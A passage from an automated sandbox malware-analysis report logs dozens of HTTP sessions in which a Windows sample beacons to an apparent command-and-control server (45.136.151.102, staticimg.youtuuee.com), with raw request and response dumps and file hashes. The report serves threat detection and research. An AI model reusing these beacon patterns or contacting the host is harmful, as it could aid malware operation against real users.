1446 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 35 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 72 41 59 4b 52 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151359,"time":1635061615,"rand_str":"RrAYKR"}0
Oct 24, 2021 09:46:55.464891911 CEST
1447 OUT POST /api/?sid=2151359&key=8e5b3dc2ab7f04f2eb1218fc34b05518 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:55.617041111 CEST
1447 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
43 192.168.2.5 49797 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:55.933140039 CEST
1448 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:56.081788063 CEST
1449 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 49 45 52 65 35 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151395,"time":1635061615,"rand_str":"hIERe5"}0
Oct 24, 2021 09:46:56.098254919 CEST
1449 OUT POST /api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 48 of 58
Oct 24, 2021 09:46:56.249144077 CEST
1450 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
44 192.168.2.5 49798 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:56.575320005 CEST
1451 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:56.724689960 CEST
1451 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 37 34 4e 57 47 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151425,"time":1635061616,"rand_str":"74NWGq"}0
Oct 24, 2021 09:46:56.739645004 CEST
1451 OUT POST /api/?sid=2151425&key=ac504e0e07f53c6f4b545780dc221950 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:56.894335032 CEST
1452 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
45 192.168.2.5 49799 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:57.241782904 CEST
1453 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:57.387552977 CEST
1453 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 32 6b 61 45 51 55 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151471,"time":1635061617,"rand_str":"2kaEQU"}0
Oct 24, 2021 09:46:57.398885012 CEST
1454 OUT POST /api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 49 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
46 192.168.2.5 49800 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
47 192.168.2.5 49801 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
48 192.168.2.5 49802 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
49 192.168.2.5 49803 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
5 192.168.2.5 49753 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:17.334026098 CEST
1329 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:17.487363100 CEST
1330 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 79 54 41 42 68 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149425,"time":1635061577,"rand_str":"RyTABh"}0
Oct 24, 2021 09:46:17.528027058 CEST
1330 OUT POST /api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8dd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:17.678673983 CEST
1331 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
50 192.168.2.5 49804 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 50 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
51 192.168.2.5 49805 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
52 192.168.2.5 49806 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
53 192.168.2.5 49807 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
54 192.168.2.5 49808 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
55 192.168.2.5 49810 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
56 192.168.2.5 49814 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
57 192.168.2.5 49818 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
58 192.168.2.5 49821 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
59 192.168.2.5 49825 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
6 192.168.2.5 49754 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Copyright Joe Security LLC 2021 Page 51 of 58
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:18.505224943 CEST
1332 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:18.648884058 CEST
1332 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 39 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 61 5a 56 68 63 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149491,"time":1635061578,"rand_str":"4aZVhc"}0
Oct 24, 2021 09:46:18.781927109 CEST
1332 OUT POST /api/?sid=2149491&key=a900675f9a8d56a24a79c8f6976efc9f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:18.936049938 CEST
1333 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
60 192.168.2.5 49829 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
61 192.168.2.5 49832 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
62 192.168.2.5 49836 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
63 192.168.2.5 49840 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
64 192.168.2.5 49844 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
65 192.168.2.5 49845 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Copyright Joe Security LLC 2021 Page 52 of 58
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
66 192.168.2.5 49846 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
67 192.168.2.5 49847 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
68 192.168.2.5 49848 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
69 192.168.2.5 49849 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
7 192.168.2.5 49755 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:20.000674009 CEST
1334 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:20.147985935 CEST
1334 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 35 34 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 41 6d 64 43 72 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149549,"time":1635061580,"rand_str":"KAmdCr"}0
Oct 24, 2021 09:46:20.284533978 CEST
1335 OUT POST /api/?sid=2149549&key=ef8fb823e4ca08a782cf605473692aff HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:20.434596062 CEST
1335 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
70 192.168.2.5 49850 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Copyright Joe Security LLC 2021 Page 53 of 58
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
71 192.168.2.5 49851 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
72 192.168.2.5 49852 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
73 192.168.2.5 49853 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
74 192.168.2.5 49856 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
75 192.168.2.5 49857 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
76 192.168.2.5 49858 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
77 192.168.2.5 49859 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
78 192.168.2.5 49860 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
79 192.168.2.5 49861 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 54 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
8 192.168.2.5 49756 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:21.431983948 CEST
1336 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:21.582541943 CEST
1337 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 6b 4b 6e 35 62 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149615,"time":1635061581,"rand_str":"5kKn5b"}0
Oct 24, 2021 09:46:21.678189993 CEST
1337 OUT POST /api/?sid=2149615&key=2891fe78238bcde026f8e178fbf9a3c7 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:21.834268093 CEST
1338 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
80 192.168.2.5 49862 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
81 192.168.2.5 49863 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
82 192.168.2.5 49869 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
83 192.168.2.5 49870 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
84 192.168.2.5 49871 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 55 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
85 192.168.2.5 49872 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
86 192.168.2.5 49873 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
87 192.168.2.5 49874 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
88 192.168.2.5 49875 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
89 192.168.2.5 49876 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
9 192.168.2.5 49757 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:22.728864908 CEST
1339 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:22.873564959 CEST
1339 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 54 50 79 44 6a 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149673,"time":1635061582,"rand_str":"TPyDjq"}0
Oct 24, 2021 09:46:22.986057997 CEST
1339 OUT POST /api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:23.135428905 CEST
1340 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Copyright Joe Security LLC 2021 Page 56 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
90 192.168.2.5 49878 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
91 192.168.2.5 49879 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
92 192.168.2.5 49880 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
93 192.168.2.5 49881 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
94 192.168.2.5 49882 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
95 192.168.2.5 49883 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
96 192.168.2.5 49884 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
97 192.168.2.5 49885 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
98 192.168.2.5 49886 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
99 192.168.2.5 49887 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 57 of 58
Joe Sandbox Cloud Basic 33.0.0 White Diamond
Code Manipulations
Statistics
System Behavior
Disassembly
Code Analysis
Copyright Joe Security LLC
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Start time: 09:46:10
Start date: 24/10/2021
Path: C:\Users\user\Desktop\7PPXbfDkRN.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe'
Imagebase: 0x7ff6419c0000
File size: 1413632 bytes
MD5 hash: 1614D9ADFB1903A189E6EFD9B6DC4077
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Show Windows behavior
Show Windows behavior
Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124
General
File ReadFile Read
Key CreatedKey Created
Key Value CreatedKey Value Created
Copyright Joe Security LLC 2021 Page 58 of 58